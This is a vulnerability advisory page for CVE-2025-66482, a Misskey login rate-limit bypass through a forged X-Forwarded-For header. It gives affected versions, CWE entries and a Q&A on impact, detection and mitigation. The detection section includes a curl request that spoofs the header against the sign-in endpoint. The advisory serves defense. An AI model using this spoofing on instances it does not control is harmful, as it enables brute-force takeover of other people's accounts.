CVE-2025-66482
IP Rate Limiting Bypass in Misskey via Forged X-Forwarded-For Header
Publication date: 2025-12-16
Last updated on: 2025-12-16
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| misskey | misskey | 2025.9.1 |
| misskey | misskey | 2025.12.0-alpha.2 |
| misskey | misskey | 13.0.0-beta.16 |
| misskey | misskey | 2025.12.0 |
| misskey | misskey | 2025.11.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-1188 | The product initializes or sets a resource with a default that is intended to be changed by the product's installer, administrator, or maintainer, but the default is not secure. |
| CWE-307 | The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-66482 is a vulnerability in the Misskey social media platform where attackers can bypass IP-based login rate limiting by forging the X-Forwarded-For HTTP header. This happens when Misskey is used without a trusted reverse proxy or with an untrusted one, causing the application to trust the forged header and allowing attackers to evade rate limits and perform brute force login attacks. The issue arises because the application improperly handles client IP addresses in the authentication flow and has an insecure default configuration for the `trustProxy` setting before version 2025.12.0-alpha.2. The vulnerability is fixed by setting `trustProxy` to false by default, which disables trusting proxy headers unless explicitly configured otherwise. [1]
How can this vulnerability impact me? :
This vulnerability can allow attackers to bypass login rate limiting protections by spoofing the X-Forwarded-For header, enabling them to perform brute force attacks on user accounts. This can lead to compromised account integrity, unauthorized access, and potential misuse of user accounts. The impact includes low integrity and availability impacts but no confidentiality impact, with a moderate severity rating. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
You can detect this vulnerability by checking if your Misskey instance is vulnerable to login rate limit bypass via a spoofed X-Forwarded-For header. One way is to attempt sending a POST request to the /api/signin-flow endpoint with a forged X-Forwarded-For header and observe if rate limiting is bypassed. For example, using curl: curl -X POST https://your-misskey-instance/api/signin-flow -H "X-Forwarded-For: 1.2.3.4" -d '{"some":"data"}' and see if multiple attempts are allowed beyond the rate limit. Additionally, check your Misskey configuration file for the trustProxy setting; if it is set to true or not set (defaulting to true before v2025.12.0), your system is vulnerable. Also, verify if you are running behind a trusted reverse proxy. These checks help detect if the vulnerability is present. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) If you are running Misskey versions from 2025.9.1 to 2025.11.1, manually set 'trustProxy: false' in your configuration file to disable trusting the X-Forwarded-For header. 2) Ensure that your Misskey instance is deployed behind a trusted reverse proxy to prevent attackers from forging the X-Forwarded-For header. 3) Upgrade your Misskey installation to version 2025.12.0 or later, where the default value of 'trustProxy' is set to false, fully patching the vulnerability. 4) Verify your configuration to confirm that 'trustProxy' is set correctly to avoid insecure defaults. [1, 2]